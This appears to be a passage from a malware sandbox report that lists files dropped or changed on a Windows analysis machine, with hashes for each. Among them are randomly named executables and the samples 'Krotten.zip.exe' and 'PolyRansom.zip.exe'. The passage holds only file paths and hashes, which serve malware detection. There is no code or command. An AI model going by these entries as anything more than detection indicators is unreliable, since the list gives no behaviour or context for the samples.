| SHA512 | 8eabe81899ad25799469981bc128c7dc27ab1b696011d5a1167b4b6d79061a202d2b9469fe32639f19ef795d3c828c64af01a18e4ccbb8c3b45589b2e679a241 |
C:\Users\Admin\Desktop\ekcq.exe
| MD5 | 7b294afa599e7bb37c5fd2ee3667cb9a |
| SHA1 | 3b7919d184a687782c090406af5e3e6362f1e794 |
| SHA256 | a8dc5eb314077d9ac7afa7fc8063f56d66458f56a45eff5f8259603ddcc22fe9 |
| SHA512 | f8b765002309470a91ad8cd1b02c35f0bdf8387172d2dfaea4f2518d095590882b420d658488cd79fa8ea62d61442d7c4b0044cdd9048fa1cffaefbc0488177c |
C:\Users\Admin\Desktop\MYQS.exe
| MD5 | 705c19247db07aa13bf6f943dea4c05d |
| SHA1 | 7b849c8b6610955d88a6fa93d92800415f5baf59 |
| SHA256 | 62012bdf5e8262d01c3c2a95566652abd6f1740748d833afc38f7ced21f27746 |
| SHA512 | 2e6c0933253d2a4610755b6b709432d211fb3bdc1e90d8d1771027b3b6e059ffab7028c34e50854ed63fcdaa24b921dbee0aa385163dab9de447cf1032a12dc8 |
C:\Users\Admin\Desktop\WkYc.exe
| MD5 | a2df541acf7fac978696a9f668abbba9 |
| SHA1 | ddbd22b5bb71094f1a47fceec785faa519b647a7 |
| SHA256 | 1892eb4e73b23002ca16fd56c0d175c4ca2ea3928b315d5d73c907e555fbcb36 |
| SHA512 | d85e605fd39e62939edf2c4fe11de648067a2f7459dad1fd9dc21bcbe3965e7c82d6f503c248781a9bbdbf142044c55e46269879352356600bfb792b806877ec |
C:\Users\Admin\Desktop\gYcg.ico
| MD5 | d9b2102efaf1af6e92ab5bb19cd8b17f |
| SHA1 | 73b49ceaf86a9b004d805dd635613ef45c1311fe |
| SHA256 | 849189b8125afd288d93a42c801b9bee48d100378960408d69b5b4e01fabebae |
| SHA512 | 36543648e9ac9b2eeafac2668e4997947c2b7d2dcffbdcb9ffb1ea1985a000ccf560d8c696813703eac098da441183af331a38da1fb6a623e537b15a656fcf31 |
C:\Users\Admin\Desktop\SAkk.exe
| MD5 | 874020144f32af813e7faf93eb9c1768 |
| SHA1 | 8fa0172bec81f13113f05e785ccd151dd15b5734 |
| SHA256 | cb3cb55580054c79888123702a8592b63171f65551ba8ff162b774637d6fb879 |
| SHA512 | 19bd395829f3ed7065299819da3e08aef7d107c4938a2969095bf29fd8cd03c278dd25d104b46675f06c284822170c5a95637f9d70cef5ec39d13a25aa5030f8 |
C:\Users\Admin\Desktop\mgAk.exe
| MD5 | f2d11ded842110560f80e960151ee5f2 |
| SHA1 | a0aeb85e23f5a4d9006f1b340305db35bc731ea3 |
| SHA256 | 7b1f4b5baaf6405195b77cfd068620baf016714e46fbbd264d41c737d0e0f8ae |
| SHA512 | 029f6899e6d4fd4a9f410d9767e5362ca442ef48ffaa411d56feaa68c27f700be4b296cefd117a41d18b0ff5bda1cb3a0ed3c4b5e680e1e585c6fd1d3275b1bb |
C:\Users\Admin\Desktop\UgUg.exe
| MD5 | 0dadac461d23e9cd45730000527aa13c |
| SHA1 | acb10ad25797b78b8f7de9584555f25785db42c7 |
| SHA256 | b835bb2a28ce26f63f5a57617ff2aa471aaa29acc0cc1732edde75b23e9154b1 |
| SHA512 | dbaaa7011886a850c8d25dbb2dd979557903509533a5a87c69d6e6bf6749e46c793e560ca9595aac92085c53f4e539763a9befaaaf28414a2965e96372083831 |
C:\Users\Admin\Desktop\WsgS.ico
| MD5 | ab2fd7b2b3ab811665881e834639649c |
| SHA1 | 0a0efaaf6b36c47aa19efde1872f4bb155fb4978 |
| SHA256 | 8b45d53c87a5bf2fdca6214bceb4faa40ad29b8808e157bccdc271a05f391b4a |
| SHA512 | a25641fa189ba554fc554ffb2089d8aa844c769294ef53c08a2bc4ebac2c8496d84e1f054e3460a1ce0305fca6047bf5541655d229f0703eec76966d9cb602b5 |
C:\Users\Admin\Desktop\oocK.exe
| MD5 | 23a6a4a2929c3523ac46024c22010ece |
| SHA1 | 8d07bcc1a606ebf109ccd061c77445a7574caf95 |
| SHA256 | 81f75b45d2b8810d2a1f551b86bef68035f0019b43b7981958dea4b2c01d6283 |
| SHA512 | b450af4939ef74c0e3a69249ff7235449f139db0f144fe6b5c4742133b65d29fb15eaecb64dd2d42702c47a4c49fcabb0e52ee9584e486bc88da8cc95b4e3e87 |
C:\Users\Admin\Desktop\UUoq.exe
| MD5 | df35e09793dceb0caacb136eaf5fc012 |
| SHA1 | e8edc88b27e27bc1c57c627eb32793e4eaa0701e |
| SHA256 | 0898618821660cf078a965dc1d5e51eb9039f5454bc3233c8a584f94e2241144 |
| SHA512 | 0e7a020aadb23fcb04928e8345308a0e8c1493da2cfc427810a63f9ab4925891b8ebd085592764415f0ed79bf3b681ac98d6b24cb57f25ebe383407b3624d2c5 |
C:\Users\Admin\Desktop\qMUA.exe
| MD5 | 935d12f758e1017bf98bd9ee62819b05 |
| SHA1 | f1d928947710c86b4a9b5371f7ac686076136a88 |
| SHA256 | 44904a6d942035ca90e726ada9422e2dc292b239bb2dbdd4f7ad492131c49203 |
| SHA512 | 4628712a76d5415141ce2f7ef0c55397bfbdb8bcc8b09f70660ca6416e58ef432aec1e428b38498c3f483443b2dc50641991b388bc46b929bbacccd97e68c5d4 |
C:\Users\Admin\Desktop\okwo.exe
| MD5 | 946c2f79fbefd64f0cfe598599e0ca38 |
| SHA1 | 15caa85f5a8d9ae425aa94232953194c3e829e03 |
| SHA256 | fb3d7c3b699efbedd7b06f92b3949d82cfd6528c3de39c0c9e006e714390ec18 |
| SHA512 | 1428a59add47ab03075448ea85d56e0a6ca566f88e652f29505c62b3998763d7fbcaf748bb6b1cfb84b6fb31b86a1893dc830d9c3e0f47a49377095ad6d2dbd6 |
C:\Users\Admin\Desktop\cggw.exe
| MD5 | 53ac5eed3e6c5b266097da8be52f6f16 |
| SHA1 | 674255f2eba22d48c472ff95d59959eb4ee2140e |
| SHA256 | f5b1f0dbbc39327cdf25e14f9cc9aa3f5053857be27f6a1cdf173cfc706744e2 |
| SHA512 | e03dccc1818850dba2dc930bfe0d6198402f9d9b411db80a3fdf23dcef5c67c9dfb4a0e76fe29a54b34f52efc260c1402357618a8e8a4ca81cae2180fa3b40dc |
C:\Users\Admin\Desktop\aYom.exe
| MD5 | 25759a930ad0614e8f912fb67818a596 |
| SHA1 | 63afe79d44e565b891b65abc231570d0bc239e97 |
| SHA256 | 9fb32f5ff1669e1fa65b404de1b0e65a5ae1e0a491b36fb82e139281009edfb7 |
| SHA512 | 4fd9108c2f33914b8cb27f94a76675ee12e8b8da761ffbc4d9ec26418798eb6e9b2dab712866713876c9af79e11e02536a1cd7f5f8a555ecf5cc1bd8d7efe104 |
C:\Users\Admin\Desktop\oEcM.exe
| MD5 | 861e8d29ac1cb17eb81f2e74cbc828f6 |
| SHA1 | b72070d704b55f9e6ca24b79231c595869e9a851 |
| SHA256 | 34a2d8e59ace4506176d48874181825a39290fff16c5f29ac327fb270f66a2e7 |
| SHA512 | 110d30b977159238c0a80d0ab4aa7e1cd445816c50e6b204a6ee8732eb8e487f4bd054afdc2834fe0824c5d431dcb5eb4c190b5a39036d31ca2ab46f25430ae8 |
C:\Users\Admin\Downloads\Krotten.zip.exe
| MD5 | 0985622a8e373cfa0da4e03ef64e9e77 |
| SHA1 | 156cddfc352ea1fabf32a6e326c32265c164eb08 |
| SHA256 | 303ae9c7c46d030f8dae62efa4e444a6b93bb1bed69875228831cba760151524 |
| SHA512 | 7b8a814dd6855e162af4e9a63b45d23d96fed452797fd492357a5873df4b447955bac675db3ab716e3d50df2debf50d1f2220ac191bb3c84ef46b3454a96e46d |
C:\Users\Admin\Downloads\PolyRansom.zip.exe
| MD5 | 51683440efc2550b13993e20473af4be |
| SHA1 | 5d275cd7bba02f4cff704b559bd88cb47670cafe |
| SHA256 | 64d0b6e6b890037cb92935b630f22544cdd488f468f2b1dd3bea16d68ba0d0fb |
| SHA512 | f6f7b2af4702b4abd2c234d35e61e68b8b14bc2403df7557cadf655b7ff1755e1df81cc13b5a1a51a622966904d7e34353a83d09c15c7dd79dacb4be3cc9f61e |
C:\Users\Admin\Desktop\YUoE.exe
| MD5 | f4b7b2daf683f60b9ef58f3e2327422d |
| SHA1 | 37b9c9fee26d817683ebceb204c1a51a61c4499e |
| SHA256 | 21b1993de3b3a790cac7178209cd60c30c149b9cca6d7eaa77b839c475280d30 |
| SHA512 | 20e4e4535abe53da7bc6bb871b9272ede6ac22e70f3dee852dd5823227c0e6da63da360072b48060ccbe25687fbe8edbc75772f884cac44501dd047b2165d188 |
C:\Users\Admin\Desktop\MQca.ico
| MD5 | 8ff64aadbcb8620bd821390e245fa0e6 |
| SHA1 | 4d03910751bff2987d165c7c43e52851ae064239 |
| SHA256 | 38d6a9052a4fa9fbd656388704522cb851247c32650c387c19b15cd28ff3b6fc |
| SHA512 | b5d4dc4bea4ca5c7238d875f2f934f5813b97100e364a16c4c6bc800e9a6df06a3075d7807d8ab42e551faa3f8a870b21abb61ae4816ef95f0e7163df5f62ecb |
C:\Users\Admin\Desktop\aoAg.ico
| MD5 | 7de70c5f9fde94ce0179324aa5720a58 |
| SHA1 | b34c69a980c52938d5b4377376adf15fad17dce6 |
| SHA256 | 955ad377b15d14e80d8eb194375f26e0e9e339b1cfc1e4047e16ae0e0f90fe24 |
| SHA512 | 0b5b089bb8ae1a97e4a882f7e35c7295cb81127f0915379676590a2af296012782192381e2bf3d010f0a1c693e2eaaa2f083fd8fdd7c3191a8537b4553676ef1 |
C:\Users\Admin\Desktop\GgoW.exe
| MD5 | ddc01aa70c7a725f761f8fc30320a8ed |
| SHA1 | 57cae8ac8c5ef2017b6b0039cd73334500c4f240 |
| SHA256 | f1bc623fbd2840e1280fc58f1f432f7b09a3b4618943d1680c0c66c0b4fec710 |
| SHA512 | c38418b8362f31cfcd0bc77202b2bb8fd871f19bbe02e22a0bed367a8191825db61e057dbe03cdc4db922fcbd261861a382f3392751262e28e28f91a7963a379 |
C:\Users\Admin\Desktop\OYQa.exe
| MD5 | 5842c4c6783de340e01eca777d8dfe0e |
| SHA1 | de76d2efeb6faf138a6613d7a855cd7ac602688b |
| SHA256 | 1c85710286a81e7362f2f904baa043efced00a2a8d4927e5ef4085ab61d6f926 |
| SHA512 | 297ae8966f0a71ace6347bdd1f8209fd7d511a98cd4e13a5ad268453b4796c7b450258a243ef81bfa379e3e68c4afdb91871772b965cc0789765510c1a99dbee |
C:\Users\Admin\Desktop\WkgE.exe
| MD5 | eb3f9614424bb93c1b023f5960b9d760 |
| SHA1 | cf9edd2ada1ab4c2c2168fd859b17d94f4cab8d7 |
| SHA256 | fa6c57e797b8c02416787f653b8d6dd3e2b68065722ad45faa4595800efe9dc9 |
| SHA512 | d2b714e4ac0db382bc04bd6a6dd712e078db94962b3db81b58c9bff7a07d276da2503104f3162a8abe655c8bc7e8a8c525ac7715d5e3eb544e4342ec1d46bbcb |
C:\Users\Admin\Desktop\OwMM.exe
| MD5 | 4e757fbd4ca1be3e58f5f52112eb2f4e |
| SHA1 | 65d907cd5a37cb78d15d57cf2a4d4151b7b8c89c |
| SHA256 | bfe00be6973424cccc44d28f5ae67c4dad2af194a1b86f5fdd951adac1d642c2 |
| SHA512 | 784b978feef1cd32644e3c364280cc9e236ef9fd40992bda1f92367b1d4edf84970c2f371ea18c0630eb6d29327a4b88c972064035ad7f4750b2c16e6332484d |
C:\Users\Admin\Desktop\eUUW.exe
| MD5 | f2c3d692859d441b21fc94e89e09f257 |
| SHA1 | 127986387630524a4f5a0800383e3abdea63f96a |
| SHA256 | a8ec95a4dee7b76228b21001f292e92094ce6abf17653238bab4df5cb6973bc0 |
| SHA512 | fba7bb373cbac39c82a468a305a1080fcde110b51a3d231e4c1bdde7a0d2dbab701bf36e4e2c01fb89667784ce97d4e1387a5e69ff82eaf53bd0621faa7570a3 |
C:\Users\Admin\Desktop\IUIa.exe
| MD5 | f8d3f008323581ce726f50276e8b58da |
| SHA1 | aad11ef4fe261d92ecb604f3bbea217917408064 |
| SHA256 | 1c86c8f0a09195aa23b2b5d0e01c29cec599c0565f3cd4072dcadcee1742a093 |
| SHA512 | fb82f55e1ec26af3352d02b85d0b93b951f21b736409b6edc855a04601f563d0546dd82c9bc7f4f94095e335026de41e42d7de3a8b023f1540f7f584e4185788 |
C:\Users\Admin\Desktop\EckK.exe
| MD5 | 2fcb8e22a8a2f5b08d49228f105330df |
| SHA1 | 70908ea1589ed10ee976f5e02ee1f6ebd3d89dc8 |
| SHA256 | 34ba5aa12697c271af75a1583e4acf5d4a4ff9aa12bd114cba35fa2730d59737 |
| SHA512 | e1524752326b049b5d07809d609f0ee7ed57231444dd52979b88ca52ca02f27571057c13aa1acca40092ea3841464571791733e3623414ab1f1899ee481fc183 |
C:\Users\Admin\Desktop\gksW.exe
| MD5 | 3088e3c619693df66852105ef60bb4bc |
| SHA1 | 5ef21176872518878b66e009a28347e33cfcf3c2 |
| SHA256 | 8627bca62724a484cae94ed3c63d2814945098e01b20b0833ec049c61917c5f6 |
| SHA512 | 22eaffb2395071e245c26d52c016d7c832572df4f4b056feb187dd3e7dd5d4454a95502f3deca58c9b306e1fa22f973ff43ed65354dcfbd08611dec09139967a |
C:\Users\Admin\Desktop\WIIC.exe
| MD5 | d4c34293b77e9f9729be124e1f03e585 |
| SHA1 | e8bbc6bd2a166363434342f979b125a7f869542a |
| SHA256 | 61b6edb895de6d4d8c7f6d312ff5acbd8eb911098a1557779ae70d771b413d87 |
| SHA512 | a8a2d72eb5ac79f05d25a1502a30baa1e2fbe339861e5f053ea40c630e2a61c33bb947e952ad954de12098a508cab12456b11bdbbafdb9c46cc8b84b8ae7430b |
C:\Users\Admin\Desktop\oMAG.exe
| MD5 | 1d503167a794d705390122535717f50a |
| SHA1 | d4d32c87f8b598a80c7b1597445c9ef407e0bcd8 |
| SHA256 | 42cad772dcbe212fa024aa3a00cedb7325a2250baf38ab5fc35afe234fe7c631 |
| SHA512 | 5d71977327d64ecdaa9de09d40d8107b1e53ff58fa4ca8f81dd8a17e95b1fc7068ae8bad2de334157c92a72b43daf700db68bd0eedba2d6b42b718b134637fd9 |
C:\Users\Admin\Desktop\MgAI.exe
| MD5 | d25b8cfe619b953e2905995b70683aa0 |
| SHA1 | 674dcdf3de8a5b3a60f77bcecec78b5ff3e2271d |
| SHA256 | 9e868cdd6bea9497bd706c56cec3df6ab8373ebf1f695d169842aabf0c9378fe |
| SHA512 | 89ca6fedf690cd8da6e0105e12f2596db69b6f906f8b85e50ce619f289fdf01ff611f6aa1ac4bc9e249e5d57c6d0fa3fbea0f895f0828b8f1ac0638d25f5e065 |
C:\Users\Admin\Desktop\OMki.exe
| MD5 | 9a67ec3702bc0baddde00839bcb2721e |
| SHA1 | cb3e2bbe970c28dac8120541aaa6aa9d7d6f43f7 |
| SHA256 | 2af265a8e32b133b39b573b8da2618d6d50b435314f284b5e3a59d2cd5d63a71 |
| SHA512 | d89087ada342f24f91596705b3b8bcbe0838845b80779327c17a5cbb48003536f544fc6664565a543af7fb0315f3af98d3beb16568d6dee9e8282817af2cbab7 |
C:\Users\Admin\Desktop\EEcG.exe
| MD5 | 490fa249a71484ca4a77a0c74b8116a2 |
| SHA1 | d20419961b1fb42a7165ec1c16e34356989d97fb |
| SHA256 | 5756d1992277a183c1deb6758f39d4b75b617f1babe2b5e27513f1e1f8d51f5a |
| SHA512 | 567797690749d4c41921dcc64865552956a97c63dd1502ab1fb9f3e6c42682236ffc4722fea70a2c7eb059668b5b6a8cfff784ba0ec34cab647cbf151f3ca9a7 |
C:\Users\Admin\Desktop\IsYS.exe
| MD5 | 6afd449641450fd2b806b123a4ed66d8 |
| SHA1 | a00348402d826051490f7291e8bd3684c1d2a720 |
| SHA256 | 818fb0c8134b4ec84b076301fb06de4f60f72ee0a881147a5fd733a02a24e511 |
| SHA512 | 0fcc3305f9bca4cd1d5af1a4f744015762457f016dcfaf2b41e0c864c73f70ebe331fba2526a2c32f9b4fee6868c1846f02fcc5176e6ab7320690cb5659ca994 |
C:\Users\Admin\Desktop\SokK.ico
| MD5 | d4d5866fa12a7d7aeb990ba5eae60cb1 |
| SHA1 | a1fdfc36c9500844fe0c4554fd60cc95808bb9a8 |
| SHA256 | 5388384511211df8aa81844cff67add9646c8196456f34bb388c2bceecf5f2b4 |
| SHA512 | 7e8537da4047e751e3613bd089014d6ba3f4418a6d8f71c2cfdde146c0ef83895e74417ef19c30a63adc1d38fe0c1f8fdee3f2eb5bb0146e5043f06c73dba06d |
C:\Users\Admin\Desktop\SEIY.exe
| MD5 | d2223cef54689acc2f479813d3538d1e |
| SHA1 | 414105fa2f72cf2cbaf211372da1e96294979aaa |
| SHA256 | 2e0a0654bbc60636392beeb93311d874eb40d59faa0c0bb65e18b7f506a55c65 |
| SHA512 | 77bf7d23846d72d184baa23d810dcb2ba23afb52c71ef72c1249efa1f60867b7b5c15141331b637e6337120b5edffbe31b9d63c0a3469f3ca77ed39916945a03 |
C:\Users\Admin\Desktop\MIMC.exe
| MD5 | 26e2f78ca493ffeec5c3b08e8c03713b |
| SHA1 | 90e69b04b53b312c54b6070b6fd10c592ad30f2a |
| SHA256 | 8870b4432649023530c21ca4e10f43b4a10111c607f13328921e8db268fe5c60 |
| SHA512 | 94abfdd94385947f125cf75b251d9c22a509cd7554370d8e27dbe577307a2b27c0aecb48f400af2d8536e4df42382363659c38cc421182babd87607f37aad7dc |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 2d09dd2144feba0f5ca4b9edbed561f7 |
| SHA1 | 400641309e2a69b61a992160116763da93bcdb0c |
| SHA256 | 451d64a3548cd19e2a21d366387056216e4f2aa55b6b21972904f206c44d0c97 |
| SHA512 | c2c742692571639532f96352a0ecc963ecd0805b764472971ff78d2f5a01f27a2eb09bc9cbddfa1587d5f3a4d793b12cd7cad58fdd98dc9cf137887e7a1d63b9 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4
| MD5 | f306cf3c7d62642d436b420257de0402 |
| SHA1 | 4e7c1a4a60b369e7bcd00eda87401a874466ba81 |
| SHA256 | df72a4de4c8ae913cff92809712c6879e5ec7cefe55bdda11e4712c49ff0d99a |
| SHA512 | 1eb5fe2e3790eed03726e3c8c78bdf1d606a70d32a5a5b58f48f014f31b7cc14a8297d839f389a9fa828aae06b5fd3bd968c1172a4bb4f1ecbfc78721ef72eff |